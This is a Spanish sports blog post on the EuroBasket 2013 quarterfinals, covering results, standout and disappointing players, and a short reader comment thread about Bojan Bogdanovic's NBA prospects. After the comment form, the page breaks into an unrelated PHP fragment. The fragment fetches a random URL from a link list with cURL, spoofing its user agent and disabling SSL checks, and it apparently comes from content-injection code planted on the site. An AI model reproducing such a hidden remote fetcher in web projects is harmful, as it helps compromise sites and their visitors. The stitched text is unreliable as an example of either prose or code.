EuroNBAsket 2013: ¡Comienzan los cuartos!

17 de September de 2013 por txusma

Por fin llega la hora de la verdad. Las fases de liguilla se han hecho largas hasta el tedio. Resulta algo grotesco que equipos que llegan a este punto con tres derrotas tengan tantas opciones como cualquiera para llevarse el triunfo final.

En el grupo E hubo muy poca emoción en la jornada final. Se la jugaban Letonia y Ukrania y los letones directamente cedieron en el primer choque del día ante Bélgica. Lituania ganó a Ukrania sin forzar la marcha y Serbia se ganó el primer puesto del grupo ante Francia con el premio posterior de un cruce contra España.

En el F fue todo lo contrario. Croacia necesitó de dos prórrogas para mandar a casa a los griegos y España se dejó levantar inexplicablemente un partido controlado ante Italia, también en el tiempo añadido. Por su parte, Finlandia trituró a los eslovenos en modo relax.

DESTACADOS

Bojan Bogdanovic: Sufrió problemas de faltas pero supo mantener la cabeza fría para mantenerse en pista hasta dos prórrogas. Mostró una gran personalidad asumiendo la responsabilidad en los momentos más calientes. 22 puntos, 4 rebotes. 

Marc Gasol: 32 puntos, 10 rebotes y 1 robo ante una meritoria defensa de Marco Cusin. Es increíble que una selección como España pierda un choque ganado con una actuación así del mejor jugador del campeonato.

Marco Belinelli: Irregular pero importante para lograr la machada. 16 puntos, 8 rebotes en 35 minutos en pista.

Luigi Datome: Flojo partido pero fue suya la canasta que dio la vida a Italia, debajo del aro y con Marc situado en una esquina por decisión técnica. 11 puntos, 4 rebotes, 1 tapón y 1 asistencia.

Nemanja Nedovic: Volvimos a ver su mejor versión y de titular. 17 puntos, 3 rebotes, 1 asistencia y 1 robo.

DECEPCIONES

José Calderón: Inoperante. 5 puntos, 2 asistencias y 1 robo. 2 de 10 en sus lanzamientos.

Ricky Rubio: Desaparecido. 2 puntos, 1 rebote y 1 asistencia. Se comió la finta de Datome en la jugada decisiva y Sergio Rodriguez le comió la tostada dirigiendo al equipo.

Goran Dragic: 5 minutos jugado en un partido sin trascendencia. Para eso sirve un campeonato de este formato. Para disfrutar de partidos sin interés como el de ayer.

Comenta

7 comentarios a esta entrada

  1. Denise dice:
    #1

    Pero Bogdanovic no juega en la NBA., no?

    No sé si alguien lo vio, pero que exhibición desde el triple de Finlandia a Eslovenia. Este Eurobasket tiene tan poca calidad que está todo muy abierto, salvo Ucrania, creo que cualquiera de los 7 equipos restantes puede ganar.

    Y sobre España, pésimo torneo, si no fuese por Marc, creo que no habrían pasado ni la primera ronda.

      Citar

  2. TheDeerHunter dice:
    #2

    Pues macho, al final parece que no juega en la NBA.
    http://www.nydailynews.com/sports/basketball/nets/bogdanovic-won-join-nets-deal-falls-article-1.1395135

    Es la última noticia que hay al respecto. Yo se lo oí a Daimiel en la retransmisión del primer partido ante Croacia, lo traté de contrastar… pero está visto que es un error.

      Citar

  3. rumbero dice:
    #3

    Denise:
    No sé si alguien lo vio, pero que exhibición desde el triple de Finlandia a Eslovenia. Este Eurobasket tiene tan poca calidad que está todo muy abierto, salvo Ucrania, creo que cualquiera de los 7 equipos restantes puede ganar.

    Y sobre España, pésimo torneo, si no fuese por Marc, creo que no habrían pasado ni la primera ronda.

    Ojo con los ninjas ucranianos de Fratello + Pooh Jeter tal y como va el torneo.
    Y Bogdanovic no irá a la NBA pero calidad no le falta. Enorme su final de partido contra los griegos

      Citar

  4. txusma dice:
    #4

    Pues vaya. Yo tb estaba convencido de que Bogdanovic iba a la NBA a agitar la toalla (y no por falta de calidad)

      Citar

  5. Nacho dice:
    #5

    rumbero: Ojo con los ninjas ucranianos de Fratello + Pooh Jeter tal y como va el torneo.
    Y Bogdanovic no irá a la NBA pero calidad no le falta.Enorme su final de partido contra los griegos

    Hombre, realmente ahora empieza el europeo de verdad (Orenga dimite ya). Lo que ha pasado hasta ahora no sirve. Lo de Fratello tiene que terminar cuanto antes, no soporto los implantes en sesentones, jejeje.
    Ganará el finalista del cuadro de España, es infinitamente superior al otro. Ahora, eso sí, meteré la pata en el comentario.
    Y Bogdanovic (en realidad los dos, porque el serbio tampoco es manco) es un crack, pero al final está en el Fenerbahce con Obradovic, infinitamente mejor para su progresión que los Nets.

      Citar

  6. txusma dice:
    #6

    Nemanja Bjeliça también sonó para ir este mismo año a la NBA. Tras rechazar al Barça donde ha acabado? No me está pareciendo nada malo su campeonato.

      Citar

  7. Nacho dice:
    #7

    Creo que tb en el Fenerbahce

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>